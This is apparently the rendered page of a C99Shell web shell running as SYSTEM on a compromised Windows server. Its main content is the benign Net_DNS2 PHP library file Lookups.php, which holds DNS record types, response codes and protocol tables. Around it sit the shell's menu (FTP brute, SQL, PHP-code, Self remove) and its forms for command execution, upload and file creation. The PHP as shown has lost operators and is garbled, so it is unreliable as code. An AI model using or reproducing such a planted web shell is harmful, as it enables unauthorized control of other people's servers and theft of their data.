!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\php\pear\Net\DNS2\   drwxrwxrwx
Free 1.14 GB of 239.26 GB (0.48%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Lookups.php (20.87 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */

/**
 * DNS Library for handling lookups and updates. 
 *
 * PHP Version 5
 *
 * Copyright (c) 2010, Mike Pultz <mike@mikepultz.com>.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 *   * Redistributions of source code must retain the above copyright
 *     notice, this list of conditions and the following disclaimer.
 *
 *   * Redistributions in binary form must reproduce the above copyright
 *     notice, this list of conditions and the following disclaimer in
 *     the documentation and/or other materials provided with the
 *     distribution.
 *
 *   * Neither the name of Mike Pultz nor the names of his contributors 
 *     may be used to endorse or promote products derived from this 
 *     software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
 * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRIC
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 * @category  Networking
 * @package   Net_DNS2
 * @author    Mike Pultz <mike@mikepultz.com>
 * @copyright 2010 Mike Pultz <mike@mikepultz.com>
 * @license   http://www.opensource.org/licenses/bsd-license.php  BSD License
 * @version   SVN: $Id: Lookups.php 136 2011-12-04 23:53:40Z mike.pultz $
 * @link      http://pear.php.net/package/Net_DNS2
 * @since     File available since Release 0.6.0
 *
 */

//
// initalize the packet id value
//
Net_DNS2_Lookups::$next_packet_id   mt_rand(065535);

//
// build the reverse lookup tables; this is just so we don't have to
// have duplicate static content laying around.
//
Net_DNS2_Lookups::$rr_types_by_id       array_flip(Net_DNS2_Lookups::$rr_types_by_name);
Net_DNS2_Lookups::$classes_by_id        array_flip(Net_DNS2_Lookups::$classes_by_name);
Net_DNS2_Lookups::$rr_types_class_to_id array_flip(Net_DNS2_Lookups::$rr_types_id_to_class);
Net_DNS2_Lookups::$algorithm_name_to_id array_flip(Net_DNS2_Lookups::$algorithm_id_to_name);
Net_DNS2_Lookups::$digest_name_to_id    array_flip(Net_DNS2_Lookups::$digest_id_to_name);
Net_DNS2_Lookups::$rr_qtypes_by_id      array_flip(Net_DNS2_Lookups::$rr_qtypes_by_name);
Net_DNS2_Lookups::$rr_metatypes_by_id   array_flip(Net_DNS2_Lookups::$rr_metatypes_by_name);
Net_DNS2_Lookups::$protocol_by_id       array_flip(Net_DNS2_Lookups::$protocol_by_name);

/**
 * This class provides simple lookups used througout the Net_DNS2 code
 * 
 * @category Networking
 * @package  Net_DNS2
 * @author   Mike Pultz <mike@mikepultz.com>
 * @license  http://www.opensource.org/licenses/bsd-license.php  BSD License
 * @link     http://pear.php.net/package/Net_DNS2
 * 
 */
class Net_DNS2_Lookups
{
    
/*
     * size (in bytes) of a header in a standard DNS packet
     */
    
const DNS_HEADER_SIZE       12;

    
/*
     * max size of a UDP packet
     */
    
const DNS_MAX_UDP_SIZE      512;
    
    
/*
     * Query/Response flag
     */
    
const QR_QUERY              0;        // RFC 1035
    
const QR_RESPONSE           1;        // RFC 1035

    /*
     * DNS Op Codes
     */
    
const OPCODE_QUERY          0;        // RFC 1035
    
const OPCODE_IQUERY         1;        // RFC 1035, RFC 3425
    
const OPCODE_STATUS         2;        // RFC 1035
    
const OPCODE_NOTIFY         4;        // RFC 1996
    
const OPCODE_UPDATE         5;        // RFC 2136

    /*
     * Resource Record Classes
     */
    
const RR_CLASS_IN           1;        // RFC 1035
    
const RR_CLASS_CH           3;        // RFC 1035
    
const RR_CLASS_HS           4;        // RFC 1035
    
const RR_CLASS_NONE         254;      // RFC 2136
    
const RR_CLASS_ANY          255;      // RFC 1035

    /*
     * DNS Response Codes
     */
    
const RCODE_NOERROR         0;        // RFC 1035
    
const RCODE_FORMERR         1;        // RFC 1035
    
const RCODE_SERVFAIL        2;        // RFC 1035
    
const RCODE_NXDOMAIN        3;        // RFC 1035
    
const RCODE_NOTIMP          4;        // RFC 1035
    
const RCODE_REFUSED         5;        // RFC 1035
    
const RCODE_YXDOMAIN        6;        // RFC 2136
    
const RCODE_YXRRSET         7;        // RFC 2136
    
const RCODE_NXRRSET         8;        // RFC 2136
    
const RCODE_NOTAUTH         9;        // RFC 2136
    
const RCODE_NOTZONE         10;       // RFC 2136

    // 11-15 reserved

    
const RCODE_BADSIG          16;       // RFC 2845    
    
const RCODE_BADKEY          17;       // RFC 2845
    
const RCODE_BADTIME         18;       // RFC 2845
    
const RCODE_BADMODE         19;       // RFC 2930
    
const RCODE_BADNAME         20;       // RFC 2930
    
const RCODE_BADALG          21;       // RFC 2930
    
const RCODE_BADTRUNC        22;       // RFC 4635

    /*
     * internal errors codes returned by the exceptions class
     */
    
const E_NONE                0;
    const 
E_DNS_FORMERR         self::RCODE_FORMERR;
    const 
E_DNS_SERVFAIL        self::RCODE_SERVFAIL;
    const 
E_DNS_NXDOMAIN        self::RCODE_NXDOMAIN;
    const 
E_DNS_NOTIMP          self::RCODE_NOTIMP;
    const 
E_DNS_REFUSED         self::RCODE_REFUSED;
    const 
E_DNS_YXDOMAIN        self::RCODE_YXDOMAIN;
    const 
E_DNS_YXRRSET         self::RCODE_YXRRSET;
    const 
E_DNS_NXRRSET         self::RCODE_NXRRSET;
    const 
E_DNS_NOTAUTH         self::RCODE_NOTAUTH;
    const 
E_DNS_NOTZONE         self::RCODE_NOTZONE;

    
// 11-15 reserved

    
const E_DNS_BADSIG          self::RCODE_BADSIG;
    const 
E_DNS_BADKEY          self::RCODE_BADKEY;
    const 
E_DNS_BADTIME         self::RCODE_BADTIME;
    const 
E_DNS_BADMODE         self::RCODE_BADMODE;
    const 
E_DNS_BADNAME         self::RCODE_BADNAME;
    const 
E_DNS_BADALG          self::RCODE_BADALG;
    const 
E_DNS_BADTRUNC        self::RCODE_BADTRUNC;    

    
// other error conditions

    
const E_NS_INVALID_FILE     200;
    const 
E_NS_INVALID_ENTRY    201;
    const 
E_NS_FAILED           202;

    const 
E_PACKET_INVALID      300;
    const 
E_PARSE_ERROR         301;
    const 
E_HEADER_INVALID      302;
    const 
E_QUESTION_INVALID    303;
    const 
E_RR_INVALID          304;

    const 
E_OPENSSL_ERROR       400;
    const 
E_OPENSSL_UNAVAIL     401;
    const 
E_OPENSSL_INV_PKEY    402;
    const 
E_OPENSSL_INV_ALGO    403;

    const 
E_CACHE_UNSUPPORTED   500;
    const 
E_CACHE_SHM_FILE      501;
    const 
E_CACHE_SHM_UNAVAIL   502;

    
/*
     * DNSSEC Algorithms
     */
    
const DNSSEC_ALGORITHM_RES                  0;
    const 
DNSSEC_ALGORITHM_RSAMD5               1;
    const 
DNSSEC_ALGORITHM_DH                   2;
    const 
DNSSEC_ALGORITHM_DSA                  3;
    const 
DNSSEC_ALGORITHM_ECC                  4;
    const 
DNSSEC_ALGORITHM_RSASHA1              5;
    const 
DNSSEC_ALGORITHM_DSANSEC3SHA1         6;
    const 
DSNSEC_ALGORITHM_RSASHA1NSEC3SHA1     7;
    const 
DNSSEC_ALGORITHM_RSASHA256            8;
    const 
DNSSEC_ALGORITHM_RSASHA512            10;
    const 
DNSSEC_ALGORITHM_ECCGOST              12;
    const 
DNSSEC_ALGORITHM_INDIRECT             252;
    const 
DNSSEC_ALGORITHM_PRIVATEDNS           253;
    const 
DNSSEC_ALGORITHM_PRIVATEOID           254;

    
/*
     * DNSSEC Digest Types
     */
    
const DNSSEC_DIGEST_RES                     0;
    const 
DNSSEC_DIGEST_SHA1                    1;

    
/*
     * The packet id used when sending requests
     */
    
public static $next_packet_id;

    
/*
     * Used to map resource record types to their id's, and back
     */
    
public static $rr_types_by_id = array();
    public static 
$rr_types_by_name = array(

        
'SIG0'          => 0,       // RFC 2931 pseudo type
        
'A'             => 1,       // RFC 1035
        
'NS'            => 2,       // RFC 1035
        
'MD'            => 3,       // RFC 1035 - obsolete, Not implemented
        
'MF'            => 4,       // RFC 1035 - obsolete, Not implemented
        
'CNAME'         => 5,       // RFC 1035
        
'SOA'           => 6,       // RFC 1035
        
'MB'            => 7,       // RFC 1035 - obsolete, Not implemented
        
'MG'            => 8,       // RFC 1035 - obsolete, Not implemented
        
'MR'            => 9,       // RFC 1035 - obsolete, Not implemented
        
'NULL'          => 10,      // RFC 1035 - obsolete, Not implemented
        
'WKS'           => 11,      // RFC 1035
        
'PTR'           => 12,      // RFC 1035
        
'HINFO'         => 13,      // RFC 1035
        
'MINFO'         => 14,      // RFC 1035 - obsolete, Not implemented
        
'MX'            => 15,      // RFC 1035
        
'TXT'           => 16,      // RFC 1035
        
'RP'            => 17,      // RFC 1183
        
'AFSDB'         => 18,      // RFC 1183
        
'X25'           => 19,      // RFC 1183
        
'ISDN'          => 20,      // RFC 1183
        
'RT'            => 21,      // RFC 1183
        
'NSAP'          => 22,      // RFC 1706
        
'NSAP_PTR'      => 23,      // RFC 1348 - obsolete, Not implemented
        
'SIG'           => 24,      // RFC 2535
        
'KEY'           => 25,      // RFC 2535, RFC 2930
        
'PX'            => 26,      // RFC 2163
        
'GPOS'          => 27,      // RFC 1712 - Not implemented
        
'AAAA'          => 28,      // RFC 3596
        
'LOC'           => 29,      // RFC 1876
        
'NXT'           => 30,      // RFC 2065, obsoleted by by RFC 3755
        
'EID'           => 31,      // [Patton][Patton1995]
        
'NIMLOC'        => 32,      // [Patton][Patton1995]
        
'SRV'           => 33,      // RFC 2782
        
'ATMA'          => 34,      // Windows only
        
'NAPTR'         => 35,      // RFC 2915
        
'KX'            => 36,      // RFC 2230
        
'CERT'          => 37,      // RFC 4398
        
'A6'            => 38,      // downgraded to experimental by RFC 3363
        
'DNAME'         => 39,      // RFC 2672
        
'SINK'          => 40,      // Not implemented
        
'OPT'           => 41,      // RFC 2671
        
'APL'           => 42,      // RFC 3123
        
'DS'            => 43,      // RFC 4034
        
'SSHFP'         => 44,      // RFC 4255
        
'IPSECKEY'      => 45,      // RFC 4025
        
'RRSIG'         => 46,      // RFC 4034
        
'NSEC'          => 47,      // RFC 4034
        
'DNSKEY'        => 48,      // RFC 4034
        
'DHCID'         => 49,      // RFC 4701
        
'NSEC3'         => 50,      // RFC 5155
        
'NSEC3PARAM'    => 51,      // RFC 5155

                                    // 52 - 54 unassigned

        
'HIP'           => 55,      // RFC 5205
        
'NINFO'         => 56,      // Not implemented
        
'RKEY'          => 57,      // Not implemented
        
'TALINK'        => 58,      // IETF (draft-barwood-dnsop-ds-publish-02)
        
'CDS'           => 59,      // IETF (draft-barwood-dnsop-ds-publish-02)

                                    // 60 - 98 unassigned

        
'SPF'           => 99,      // RFC 4408
        
'UINFO'         => 100,     // no RFC, Not implemented
        
'UID'           => 101,     // no RFC, Not implemented
        
'GID'           => 102,     // no RFC, Not implemented
        
'UNSPEC'        => 103,     // no RFC, Not implemented

                                    // 104 - 248 unassigned

        
'TKEY'          => 249,     // RFC 2930
        
'TSIG'          => 250,     // RFC 2845
        
'IXFR'          => 251,     // RFC 1995 - only a full (AXFR) is supported
        
'AXFR'          => 252,     // RFC 1035
        
'MAILB'         => 253,     // RFC 883, Not implemented
        
'MAILA'         => 254,     // RFC 973, Not implemented
        
'ANY'           => 255,     // RFC 1035 - we support both 'ANY' and '*'
        
'URI'           => 256,     // tools.ietf.org/html/draft-faltstrom-uri-06
        
'CAA'           => 257,     // tools.ietf.org/html/draft-ietf-pkix-caa-03

                                    // 258 - 32767 unassigned

        
'TA'            => 32768,   // same as DS
        
'DLV'           => 32769    // RFC 4431
    
);

    
/*
     * Qtypes and Metatypes - defined in RFC2929 section 3.1
     */
    
public static $rr_qtypes_by_id = array();
    public static 
$rr_qtypes_by_name = array(

        
'IXFR'          => 251,     // RFC 1995 - only a full (AXFR) is supported
        
'AXFR'          => 252,     // RFC 1035
        
'MAILB'         => 253,     // RFC 883, Not implemented
        
'MAILA'         => 254,     // RFC 973, Not implemented
        
'ANY'           => 255      // RFC 1035 - we support both 'ANY' and '*'
    
);
    
    public static 
$rr_metatypes_by_id = array();
    public static 
$rr_metatypes_by_name = array(

        
'OPT'           => 41,      // RFC 2671
        
'TKEY'          => 249,     // RFC 2930
        
'TSIG'          => 250      // RFC 2845
    
);

    
/*
     * used to map resource record id's to RR class names
     */
    
public static $rr_types_class_to_id = array();
    public static 
$rr_types_id_to_class = array(

        
1           => 'Net_DNS2_RR_A',
        
2           => 'Net_DNS2_RR_NS',
        
5           => 'Net_DNS2_RR_CNAME',
        
6           => 'Net_DNS2_RR_SOA',
        
11          => 'Net_DNS2_RR_WKS',
        
12          => 'Net_DNS2_RR_PTR',
        
13          => 'Net_DNS2_RR_HINFO',
        
15          => 'Net_DNS2_RR_MX',
        
16          => 'Net_DNS2_RR_TXT',
        
17          => 'Net_DNS2_RR_RP',
        
18          => 'Net_DNS2_RR_AFSDB',
        
19          => 'Net_DNS2_RR_X25',
        
20          => 'Net_DNS2_RR_ISDN',
        
21          => 'Net_DNS2_RR_RT',
        
22          => 'Net_DNS2_RR_NSAP',
        
24          => 'Net_DNS2_RR_SIG',
        
25          => 'Net_DNS2_RR_KEY',
        
26          => 'Net_DNS2_RR_PX',
        
28          => 'Net_DNS2_RR_AAAA',
        
29          => 'Net_DNS2_RR_LOC',
        
31          => 'Net_DNS2_RR_EID',
        
32          => 'Net_DNS2_RR_NIMLOC',
        
33          => 'Net_DNS2_RR_SRV',
        
34          => 'Net_DNS2_RR_ATMA',
        
35          => 'Net_DNS2_RR_NAPTR',
        
36          => 'Net_DNS2_RR_KX',
        
37          => 'Net_DNS2_RR_CERT',
        
39          => 'Net_DNS2_RR_DNAME',
        
41          => 'Net_DNS2_RR_OPT',
        
42          => 'Net_DNS2_RR_APL',
        
43          => 'Net_DNS2_RR_DS',
        
44          => 'Net_DNS2_RR_SSHFP',
        
45          => 'Net_DNS2_RR_IPSECKEY',
        
46          => 'Net_DNS2_RR_RRSIG',
        
47          => 'Net_DNS2_RR_NSEC',
        
48          => 'Net_DNS2_RR_DNSKEY',
        
49          => 'Net_DNS2_RR_DHCID',
        
50          => 'Net_DNS2_RR_NSEC3',
        
51          => 'Net_DNS2_RR_NSEC3PARAM',
        
55          => 'Net_DNS2_RR_HIP',
        
58          => 'Net_DNS2_RR_TALINK',
        
59          => 'Net_DNS2_RR_CDS',
        
99          => 'Net_DNS2_RR_SPF',
        
249         => 'Net_DNS2_RR_TKEY',
        
250         => 'Net_DNS2_RR_TSIG',

    
//    251            - IXFR - handled as a full zone transfer (252)
    //    252            - AXFR - handled as a function call
    //    255            - ANY - used only for queries

        
256         => 'Net_DNS2_RR_URI',
        
257         => 'Net_DNS2_RR_CAA',
        
32768       => 'Net_DNS2_RR_TA',
        
32769       => 'Net_DNS2_RR_DLV'
    
);

    
/*
     * used to map resource record class names to their id's, and back
     */
    
public static $classes_by_id = array();
    public static 
$classes_by_name = array(

        
'IN'    => self::RR_CLASS_IN,        // RFC 1035
        
'CH'    => self::RR_CLASS_CH,        // RFC 1035
        
'HS'    => self::RR_CLASS_HS,        // RFC 1035
        
'NONE'  => self::RR_CLASS_NONE,      // RFC 2136
        
'ANY'   => self::RR_CLASS_ANY        // RFC 1035
    
);

    
/*
     * maps response codes to error messages
     */
    
public static $result_code_messages = array(

        
self::RCODE_NOERROR     => 'The request completed successfully.',
        
self::RCODE_FORMERR     => 'The name server was unable to interpret the query.',
        
self::RCODE_SERVFAIL    => 'The name server was unable to process this query due to a problem with the name server.',
        
self::RCODE_NXDOMAIN    => 'The domain name referenced in the query does not exist.',
        
self::RCODE_NOTIMP      => 'The name server does not support the requested kind of query.',
        
self::RCODE_REFUSED     => 'The name server refuses to perform the specified operation for policy reasons.',
        
self::RCODE_YXDOMAIN    => 'Name Exists when it should not.',
        
self::RCODE_YXRRSET     => 'RR Set Exists when it should not.',
        
self::RCODE_NXRRSET     => 'RR Set that should exist does not.',
        
self::RCODE_NOTAUTH     => 'Server Not Authoritative for zone.',
        
self::RCODE_NOTZONE     => 'Name not contained in zone.',

        
self::RCODE_BADSIG      => 'TSIG Signature Failure.',
        
self::RCODE_BADKEY      => 'Key not recognized.',
        
self::RCODE_BADTIME     => 'Signature out of time window.',
        
self::RCODE_BADMODE     => 'Bad TKEY Mode.',
        
self::RCODE_BADNAME     => 'Duplicate key name.',
        
self::RCODE_BADALG      => 'Algorithm not supported.',
        
self::RCODE_BADTRUNC    => 'Bad truncation.'
    
);

    
/*
     * maps DNS SEC alrorithms to their mnemonics
     */
    
public static $algorithm_name_to_id = array();
    public static 
$algorithm_id_to_name = array(
    
        
self::DNSSEC_ALGORITHM_RES                  => 'RES',
        
self::DNSSEC_ALGORITHM_RSAMD5               => 'RSAMD5',
        
self::DNSSEC_ALGORITHM_DH                   => 'DH',
        
self::DNSSEC_ALGORITHM_DSA                  => 'DSA',
        
self::DNSSEC_ALGORITHM_ECC                  => 'ECC',
        
self::DNSSEC_ALGORITHM_RSASHA1              => 'RSASHA1',
        
self::DNSSEC_ALGORITHM_DSANSEC3SHA1         => 'DSA-NSEC3-SHA1',
        
self::DSNSEC_ALGORITHM_RSASHA1NSEC3SHA1     => 'RSASHA1-NSEC3-SHA1',
        
self::DNSSEC_ALGORITHM_RSASHA256            => 'RSASHA256',
        
self::DNSSEC_ALGORITHM_RSASHA512            => 'RSASHA512',
        
self::DNSSEC_ALGORITHM_ECCGOST              => 'ECC-GOST',
        
self::DNSSEC_ALGORITHM_INDIRECT             => 'INDIRECT',
        
self::DNSSEC_ALGORITHM_PRIVATEDNS           => 'PRIVATEDNS',
        
self::DNSSEC_ALGORITHM_PRIVATEOID           => 'PRIVATEOID'
    
);

    
/*
     * maps DNSSEC digest types to their mnemonics
     */
    
public static $digest_name_to_id = array();
    public static 
$digest_id_to_name = array(

        
self::DNSSEC_DIGEST_RES         => 'RES',
        
self::DNSSEC_DIGEST_SHA1        => 'SHA-1'
    
);

    
/*
     * Protocols names - RFC 1010
     */
    
public static $protocol_by_id = array();
    public static 
$protocol_by_name = array(

        
'ICMP'          => 1,
        
'IGMP'          => 2,
        
'GGP'           => 3,
        
'ST'            => 5,
        
'TCP'           => 6,
        
'UCL'           => 7,
        
'EGP'           => 8,
        
'IGP'           => 9,
        
'BBN-RCC-MON'   => 10,
        
'NVP-II'        => 11,
        
'PUP'           => 12,
        
'ARGUS'         => 13,
        
'EMCON'         => 14,
        
'XNET'          => 15,
        
'CHAOS'         => 16,
        
'UDP'           => 17,
        
'MUX'           => 18,
        
'DCN-MEAS'      => 19,
        
'HMP'           => 20,
        
'PRM'           => 21,
        
'XNS-IDP'       => 22,
        
'TRUNK-1'       => 23,
        
'TRUNK-2'       => 24,
        
'LEAF-1'        => 25,
        
'LEAF-2'        => 26,
        
'RDP'           => 27,
        
'IRTP'          => 28,
        
'ISO-TP4'       => 29,
        
'NETBLT'        => 30,
        
'MFE-NSP'       => 31,
        
'MERIT-INP'     => 32,
        
'SEP'           => 33,
        
// 34 - 60      - Unassigned
        // 61           - any host internal protocol
        
'CFTP'          => 62,
        
// 63           - any local network
        
'SAT-EXPAK'     => 64,
        
'MIT-SUBNET'    => 65,
        
'RVD'           => 66,
        
'IPPC'          => 67,
        
// 68           - any distributed file system
        
'SAT-MON'       => 69,
        
// 70           - Unassigned
        
'IPCV'          => 71,
        
// 72 - 75      - Unassigned
        
'BR-SAT-MON'    => 76,
        
// 77           - Unassigned
        
'WB-MON'        => 78,
        
'WB-EXPAK'      => 79
        
// 80 - 254     - Unassigned
        // 255          - Reserved
    
);
}

/*
 * Local variables:
 * tab-width: 4
 * c-basic-offset: 4
 * c-hanging-comment-ender-p: nil
 * End:
 */
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--